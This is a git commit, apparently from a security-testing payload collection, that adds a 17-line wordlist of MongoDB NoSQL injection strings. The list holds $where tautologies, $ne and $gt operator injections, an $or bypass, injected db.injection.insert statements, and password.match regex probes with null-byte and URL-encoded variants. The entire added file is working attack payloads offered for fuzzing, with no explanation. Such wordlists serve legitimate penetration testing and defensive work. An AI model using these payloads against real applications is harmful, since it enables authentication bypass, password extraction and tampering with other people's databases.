added wordlist for no-sqli-injections for mongoDB

Merge pull request #156 from cr0hn/master
2024-11-10 05:24:12 +00:00 · 2016-09-20 08:00:36 -04:00 · 2016-09-20 08:00:36 -04:00 · 217cfdc9ad
commit 217cfdc9ad
parent 104aac598d e2062d0dbb
1 changed files with 17 additions and 0 deletions
--- a/attack/no-sql-injection/mongodb.txt
+++ b/attack/no-sql-injection/mongodb.txt
@ -0,0 +1,17 @@
+true, $where: '1 == 1'
+, $where: '1 == 1'
+$where: '1 == 1'
+', $where: '1 == 1'
+1, $where: '1 == 1'
+{ $ne: 1 }
+', $or: [ {}, { 'a':'a
+' } ], $comment:'successful MongoDB injection'
+db.injection.insert({success:1});
+db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
+|| 1==1
+' && this.password.match(/.*/)//+%00
+' && this.passwordzz.match(/.*/)//+%00
+'%20%26%26%20this.password.match(/.*/)//+%00
+'%20%26%26%20this.passwordzz.match(/.*/)//+%00
+{$gt: ''}
+[$ne]=1